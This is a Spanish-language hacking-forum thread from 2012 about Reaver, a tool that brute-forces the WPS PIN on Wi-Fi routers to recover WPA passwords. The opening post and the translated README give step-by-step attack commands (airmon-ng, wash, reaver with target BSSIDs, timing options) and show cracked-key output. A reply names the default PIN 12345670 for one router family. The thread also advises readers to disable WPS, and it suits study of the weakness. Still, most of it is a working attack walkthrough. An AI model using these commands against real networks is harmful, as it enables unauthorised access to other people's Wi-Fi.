elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux (Moderador: ChimoC)
| | | |-+  REAVER: Vulnerabilidad de WPA por WPS habilitado
0 Usuarios y 3 Visitantes están viendo este tema.
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 92 Ir Abajo Respuesta Imprimir
Autor Tema: REAVER: Vulnerabilidad de WPA por WPS habilitado  (Leído 453,236 veces)
ChimoC
Por la libertad y contra el terrorismo
Moderador
***
Desconectado Desconectado

Mensajes: 5.141


Paz, dignidad y justicia


Ver Perfil
REAVER: Vulnerabilidad de WPA por WPS habilitado
« en: 15 Enero 2012, 02:25 »

Buenas:

Hemos estado hablando del tema pero no hemos hecho ningun post :silbar:

Reaver lo podeis descargar aqui http://code.google.com/p/reaver-wps/downloads/list o bien usarlo con wifiway (que ya lo lleva incorporado)

1.- Walsh --> Lo que hará es detectar qué APs pudiesen ser vulnerables (actualmente es wash  sin "l")

Walsh v1.3

Required Arguments:
 -i, --interface=<iface> Interface to capture packets on
 -f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
 -c, --channel=<num> Channel to listen on [auto]
 -o, --out-file=<file> Write data to file
 -n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
 -C, --ignore-fcs Ignore frame checksum errors
 -5, --5ghz Use 5GHz 802.11 channels
 -s, --scan Use scan mode
 -u, --survey Use survey mode [default]
 -h, --help Show help

Ejemplo de uso: walsh -i mon0 (actualmente sería wash -i mon0)

Scanning for supported APs...

00:19:15:XXXXXXXX WLAN_5XXX
00:19:15:XXXXXXXX WLAN_3XXX
X0:21:B7:XXXXXXXX XXXXXXXXX
64:68:0C:XXXXXXXX WLAN_XXXX
C4:3D:C7:XXXXXXXX ONOXXX

Lo debeis parar con control+c

2.- reaver: Sirve para lanzar los PINS e ir probando. Puede llegar a tardar muchas horas (como 11 que tardé yo, por ejemplo)

Uso: reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv

Resultado

  • 94.67% complete @ 2012-01-08 08:34:36 (4 seconds/attempt)
  • WPS PIN: '5XXXXXXX'
  • WPA PSK: '1XXXXXXXXX'
  • AP SSID: 'ONOXXXX'

Así que ya sabeis que debeis deshabilitar el WPS de vuestro router

Un saludo

ChimoC

P.D.: Si tecleais

reaver --man

Os saldrán más cosillas
-------------------------------------------------------------------

CHIPSETS SOPORTADOS:

Atheros AR2425 (ath5k)
Atheros AR5212
Atheros AR5213A
Atheros AR542x
Atheros AR9271 (Perfecto)
rtl8187L
rtl8187B
rtl8188ru
rtl8192cu
carl19170
ipw2000
rt2800pci
Intel 3945ABG
Intel 5100
iwl3954
iwl4965
zd1211rw

CHIPSETS CON SOPORTE PARCIAL:

ath5k
iwlagn
rtl2800usb (con compat-wireless)
b43 (Broadcom BCM4312 card)
rt73 (con driver rt2501usb)
rt2800usb (con compat-wireless-2011-12-30)
rtl819x
iwl4965
rtl8188ru
rtl8192cu

CHIPSETS NO SOPORTADOS:


iwl4965
RT3070L
Netgear WG111v3
rt2800usb (RTL3070)
rt2500
rt2570
Ipw2200
RT73usb
BCM4322
zd1211usb



--------------------------------------------------------------------

Un ejemplo del user GARCAD


Se puede usar el binario de walsh 1.3 en wifiway 3.4 perfectamente desde el directorio por ejemplo /root al mismo tiempo que tener instalada la version 1.4

Para los que les quede duda, mas rapido en mi caso imposible 5 segundos.

Código:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Trying pin XXXXXXXX
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 5 seconds
[+] WPS PIN: 'XXXXXXXX'
[+] WPA PSK: 'nXXXXXXXXXXXXXX0'
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.
Yo el proceso lo hago del siguiente modo.

Pongo en modo monitor el adaptador

Código:
# airmon-ng start wlan0

Me crea un clon mon0

Necesito saber el canal que emite mi router por lo que utilizo el siguiente comando para capturar el trafico con airodump-ng y visualizar el canal

Código:
# airodump-ng mon0

Cuando se en el canal que emite, cierro la ventana y sigo con...

Código:
# airodump-ng mon0 -w wps-test --beacons --chanel NUMERO --bssid ELQUETENGO

Cuando termina el proceso de capturar abrimos con Wireshark el archivo wps-test.cab.

Yo ya se que lo tengo activado, pero como han explicado como mirarlo con Wireskark sigo con el mismo rol.

Buscamos un broadcast de nuestro router como se puede ver en la siguiente imagen.



Localizamos WPS y si esta activo o no lo esta.

Si Wifi Protected Setup visualizamos 0x02 esta activo se puede mirar si es vulnerable, si vemos 0x01 esta en modo manual, desactivado.

Como esta activada la protección con Wireskark en el archivo *.cap podemos ver 0x02 puedo empezar el ataque con el reaver.

Código:
# reaver -i mon0 -b BSSIDELQUETENGAS -c ELCANLAQUEEMITES -e ESSIDELQUETENGAS -d 15 -vv

Salu2
« Última modificación: 23 Abril 2013, 11:36 por ChimoC » En línea

beholdthe


Desconectado Desconectado

Mensajes: 2.330


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #1 en: 18 Enero 2012, 01:13 »

ChimoC ( es que ahora no puedo probarlo ) el walsh viene con el reaven???  es que no me fije cuando lo probe.
En caso que no venga, tienes el enlace de donde bajarlo???
En línea

ChimoC
Por la libertad y contra el terrorismo
Moderador
***
Desconectado Desconectado

Mensajes: 5.141


Paz, dignidad y justicia


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #2 en: 18 Enero 2012, 15:22 »

Buenas:

Vienen juntos ;), con instalar reaver ya se instala walsh

Un saludo

ChimoC
En línea

ChimoC
Por la libertad y contra el terrorismo
Moderador
***
Desconectado Desconectado

Mensajes: 5.141


Paz, dignidad y justicia


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #3 en: 18 Enero 2012, 21:06 »

Buenas:

Contra los routers con MAC 00:19:15:XXXXXX de WLAN_XXXX el pin por defecto es 12345670 y la clave salta en cuestión de segundos

A partir de reaver 1.4 el primer pin que prueba es 12345670, con versiones anteriores lo puedes poner a mano

reaver -i mon0 -b BSSID -p 12345670 -vv

Un saludo

ChimoC
En línea

beholdthe


Desconectado Desconectado

Mensajes: 2.330


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #4 en: 18 Enero 2012, 21:37 »

12345670...  anda que ya les vale...
En línea

juanpaqui

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #5 en: 20 Enero 2012, 20:03 »

Hola y saludos a todos, yo estoy utilizando la version de reaver 1.4 tarjeta alfa 1w realtek 8187L y cuando llega al 99.99% probando pines se cuelga y se queda ahí , que puede pasar, alguna solución,,,,, gracias a todos,,,,,,por el gran foro,,,,,
En línea

Sh4k4


Desconectado Desconectado

Mensajes: 400


xMHT


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #6 en: 20 Enero 2012, 21:33 »

Citar
1.- Walsh --> Lo que hará es detectar qué APs pudiesen ser vulnerables

No seria mas correcto decir que:
1.- Walsh --> Lo que hace es detectar que Aps que tienen WPS(no todos, aun) pero eso no quiere decir que sean vulnerables o que el WPS este ON cuando podria estar OFF.

Es correcta mi afirmacion?

En línea

ragtap

Desconectado Desconectado

Mensajes: 86


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #7 en: 23 Enero 2012, 02:21 »

Hola,

Estoy haciendo pruebas con un USB RT2570 que usa el driver RT2500. No esta en la lista oficial de compatibles, pero mucha gente esta reportando que funciona sin problemas.

Tengo con buena señal una WLAN_XXXX y MAC: 00:19:15 pero siempre obtengo esta respuesta:

  • Waiting for beacon from XX:XX:XX:XX:XX
  • Switching mon0 to channel 6
  • Associated with XX:XX:XX:XX:XX (ESSID: xxxxxxxx)
  • Trying pin 12345670
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request
  • [!] WARNING: Receive timeout occurred
  • Sending EAPOL START request

y no cambia de este estado...

¿Que creeis que puede ser?
En línea

ChimoC
Por la libertad y contra el terrorismo
Moderador
***
Desconectado Desconectado

Mensajes: 5.141


Paz, dignidad y justicia


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #8 en: 23 Enero 2012, 10:38 »

Buenas:

Fuente original

http://code.google.com/p/reaver-wps/wiki/README

Autor traduccion: gpain

Zona de Descarga


http://code.google.com/p/reaver-wps/downloads/list

Ultima version

http://reaver-wps.googlecode.com/files/reaver-1.3.tar.gz
SHA1 Checksum: 408a4d4cd5051d290a68c140d3351acbf32dc4a7

Incluido en wifiway 3.4, unica live del mundo que lo incorpora de serie
DESCARGA OFICIAL: http://download.wifislax.com/wifiway-3.4.iso
MD5: 3e0645da12d5bbbdb4dd335c891e2866

Observaciones
Puedes copiar este manual en todos los sitios que deseis, solo pedimos que por favor
mantengais el autor de la traduccion gpain



Resumen

Reaver lleva a cabo un ataque de fuerza bruta contra el número pin de la configuración protegida del punto de acceso wifi. Una vez que el pin WPS es encontrado, la WPA PSK puede ser recuperada y alternativamente la configuración inalámbrica del AP puede ser reconfigurada.

Aunque reaver no soporta la reconfiguración del AP, se puede conseguir con el wpa_supplicant una vez el pin WPS es conocido.

DESCRIPCIÓN

Reaver tiene como objectivo la funcionalidad externa de "registrador" requerida por la especificación de configuración inalámbrica protegida. Los puntos de acceso proveerán "registradores" autenticados con su configuración inalámbrica actual (incluyendo la WPA PSK), y también aceptaran una nueva configuración del registro.

Con el fin de autenticarse como "registrador", el "registrador" debe probar su conocimiento del número pin de 8 dígitos del AP. Los "registradores" deberían autenticarse a sí mismos al AP sin importar cuando sin la interacción del usuario.

A causa de que el protocolo WPS es conducido sobre EAP, el "registrador" sólo necesita estar asociado con el AP y ningún conocimiento previo del cifrado inalámbrico o de la configuración.

Reaver lleva acabo un ataque de fuerza bruta contra el AP, probando cada posible combinación para adivinar el número pin de 8 dígitos del AP. Desde que los números pin son entéramente numéricos, hay 10^8 (100.000.000) posibles valores para cualquier número pin. Sin embargo, como el último dígito del pin es un valor checksum (de comprobación) que puede ser calculado en base a los 7 dígitos previos, la posibles claves son reducidas a 10^7 (10,000,000) valores posibles.

Las posibles llaves son reducidas incluso más debido al hecho de que el protocolo de autentificación WPS corta el pin por la mitad y valida cada mitad individualmente. Eso significa que hay 10^4 (10.000) posibles valores para la primera mitad del pin y 10^3 (1.000) posibles valores para la segunda mitad del pin, contando el último dígito de comprobación del pin.

Reaver hace fuerza bruta a la primera mitad del pin y luego a la segunda mitad, provocando que todos los posibles valores del número pin del WPS puedan ser puedan ser agotados en 11.000 intentos. La velocidad a la que Reaver puede probar los números pin está totalmente limitada por la velocidad a la que el AP puede procesar peticiones WPS. Algunos APs son suficientemente rápidos para que se pueda probar un pin cada segundo; otros son mas lentos y solo permiten un pin cada 10 segundos. Estadísticamente, sólo llevara la mitad del tiempo adivinar el número pin correcto.

INSTALACIÓN

Reaver sólo está soportado en la plataforma linux, requiere las librerias libpcap y libsqlite3, y puede ser construido e instalado ejecutando:

Código:
$ ./configure
 $ make
 # make install

Para desinstalar todo lo instalado/creado por Reaver:

 
Código:
# make distclean

USO

Habitualmente, el único argumento requerido para Reaver es el nombre de la interfaz y el BSSID del AP objetivo:

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05

El canal y SSID (teniendo en cuenta que el SSID no esta encubierto) del AP objetivo son identificados automáticamente por Reaver, a menos que se especifique explícitamente en la línea de comando:

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys

Por defecto, si el AP cambia canales, Reaver también cambiará su canal en consecuencia. Sin embargo, está característica puede ser desactivada "fijando" el canal de la interfaz.

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 --fixed

El tiempo de espera de recepción por defecto es 5 segundos. Este tiempo de espera puede ser configurado manualmente si fuera necesario (el tiempo de espera mínimo es 1 segundo):

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2

El tiempo de retraso por defecto entre intentos de pin es de 1 segundo. Este valor puede ser incrementado o decrementado a cualquiera valor entero no negativo. Un valor de cero significa sin retraso:

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0

Algunos APs bloquearán temporálmente su estado WPS, normalmente durante 5 minutos o menos, cuando es detectada actividad "sospechosa". Por defecto cuando se detecta un estado bloqueado, Reaver comprobará el estado cada 315 segundos (5 minutos y 15 segundos) y no continuará haciendo fuerza bruta a los pins hasta que el estado del WPS esté desbloqueado. Esta comprobación puede ser incrementada o decrementada a cualquier valor entero no negativo:

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
Para salidas adicionales, se debe proporcionar la opción "verbose". Proporcionando la opción "verbose" dos veces se incrementará el nivel de detalle y se mostrará cada número pin intentado.

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv

El tiempo de espera por defecto para recibir los mensajes de respuesta del WPS M5 y M7 es .1 segundos. Este tiempo de espera puede ser fijado manualmente si fuese necesario (tiempo de espera máximo 1 segundo).

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5

Algunas implementaciones WPS pobres tirarán la conexión, cuando se suministre un pin inválido en vez de responder con un mensaje NACK como dicen las especificaciones. Teniendo en cuenta esto, si se alcanza el tiempo de espera de mensaje M5/M7, es tratado por defecto como un NACK. Sin embargo, si se sabe que el AP envía NACKS (la mayoría lo hacen), esta característica puede ser desactivada para mayor exactitud. Esta opción está ampliamente en desuso ya que Reaver autodetectará si un AP responde adecuadamente con NACKs o no:

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 --nack
Aunque a la mayoría de los APs no les importa, enviar un mensaje EAP FAIL para cerrar una sesión WPA es necesario a veces. Por defecto esta característica esta deshabilitada, pero puede habilitarse para aquellos APs que la necesiten.

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate

Cuando se encuentran 10 errores WPS consecutivos no esperados, se mostrará un mensaje de advertencia. Cómo esto es una señal de que el AP está limitado el ratio de intentos del pin o simplemente siendo desbordado, se fijará una pausa cuando aparezcan estos mensajes:

 
Código:
# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360

ARCHIVOS

Lo siguiente son archivos fuente de Reaver:

 80211.c Funciones para leer, enviar y analizar trazas de gestión 802.11
 builder.c Funciones para construir paquetes y paquetes de encabezado
 config.h Generado por el script de configuración
 cracker.c Funciones principales de crackeo para Reaver.
 defs.h Encabezados comunes con la mayoría de las declaraciones y definiciones requeridas.
 exchange.c Funciones para iniciar y procesar el intercambio WPS.
 globule.c Funciones de contenedor para acceder a los ajustes globales.
 iface.c Funciones de la interfaz de red.
 init.c Funciones de inicialización.
 keys.c Contiene tablas de todos los posibles pins.
 misc.c Conversión de direcciones mac, funciones de depurado, etc
 pins.c Generación de Pin y funcione de aleatoreidad.
 send.c Funciones para enviar mensajes de respuesta WPS
 sigalrm.c Funciones para el manejo de interrupciones SIGALRM
 sigint.c Funciones para el manejo de interrupciones SIGINT
 wpscrack.c Principal archivo fuente de Reaver
 wps.h Incluye funciones para wpa_supplicant
 libwps/ Generic Librería para analizar los elementos de información WPS

Los siguientes archivos han sido cogidos de wpa_supplicant. Algunos han sido modificados a partir de sus originales.

 common/
 crypto/
 tls/
 utils/
 wps/

El directorio Iew contiene la version 29 de Wireless Tools, usada para interactuar con las extensiones inalámbricas de Linux.
En línea

se_aviles

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #9 en: 23 Enero 2012, 22:14 »

Ragtap encontraste la solucion? es que ami me pasa exactamente lo mismo. saludos
En línea

heaviloto


Desconectado Desconectado

Mensajes: 779



Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #10 en: 23 Enero 2012, 22:58 »

hola,

OK!!!!!!!, sapoo!!!!, esta herramienta es la caña, mi enhorabuena a los creadores, solo decir que me corr.......!, de satisfaccion, je je jeje

un saludo
En línea

larga vida al rock&roll
heaviloto

Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver
(leño)
ChimoC
Por la libertad y contra el terrorismo
Moderador
***
Desconectado Desconectado

Mensajes: 5.141


Paz, dignidad y justicia


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #11 en: 24 Enero 2012, 09:40 »

Buenas:

@ragtap y se_aviles: ¿Qué versión de reaver estais usando?

@heaviloto: A ver si quedamos con zydas  ;-)

Un saludete

ChimoC
En línea

ps3ps3ps3

Desconectado Desconectado

Mensajes: 117


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #12 en: 24 Enero 2012, 12:31 »

Buenas,Estoy usando reaver 1.4,y os queria comentar una cosa,aller lo deje atacando por la noche y al despertar veo que llebaba un 60% pero ya no avanzaba por que habia dado este error:

Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request

Como puedo parar el ataque y seguir cuando quiera? aunque apague el pc o tenga que volver a poner la tarjeta en modo monitor,he visto que se pueden generar unos archivos XZM para salvar la sesion,pero no se como se usan o donde se colocan,gracias de antemano.
En línea

jose46lopez

Desconectado Desconectado

Mensajes: 29


Ver Perfil
Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
« Respuesta #13 en: 24 Enero 2012, 14:44 »

Buenas,Estoy usando reaver 1.4,y os queria comentar una cosa,aller lo deje atacando por la noche y al despertar veo que llebaba un 60% pero ya no avanzaba por que habia dado este error:

Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request

Como puedo parar el ataque y seguir cuando quiera? aunque apague el pc o tenga que volver a poner la tarjeta en modo monitor,he visto que se pueden generar unos archivos XZM para salvar la sesion,pero no se como se usan o donde se colocan,gracias de antemano.

A mi me lo guarda pulsando control+c (parar la maquina virtual) y luego al escribir el mismo comando (reaver -i -b...)te pondra restore previous sesion, o si no te preguntara si deseas restaurar la sesion anterior
En línea

Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 92 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
dhcp no habilitado
Hacking Wireless
garlo 4 2,893 Último mensaje 18 Abril 2008, 20:01
por ChimoC
Intrucion Iss 6.0 con put habilitado
Nivel Web
hdbreaker 1 1,809 Último mensaje 29 Diciembre 2010, 03:41
por APOKLIPTICO
Reaver Pro [Reaver-WPS Pro Edition Live DVD] « 1 2 ... 6 7 »
Wireless en Linux
P4nd3m0n1um 93 50,293 Último mensaje 1 Abril 2014, 03:27
por KarlosVid(ÊÇ)
Desinstalar reaver 1.4 e instalar reaver 1.3 en wifislax
Wireless en Linux
fjarias 5 3,404 Último mensaje 31 Octubre 2012, 21:24
por MEGAHOM
Reaver Automated Scripts (Scripts de Automatización de Reaver-WPS)
Wireless en Linux
P4nd3m0n1um 0 4,076 Último mensaje 11 Noviembre 2012, 04:34
por P4nd3m0n1um
Powered by SMF 1.1.19 | SMF © 2006-2008, Simple Machines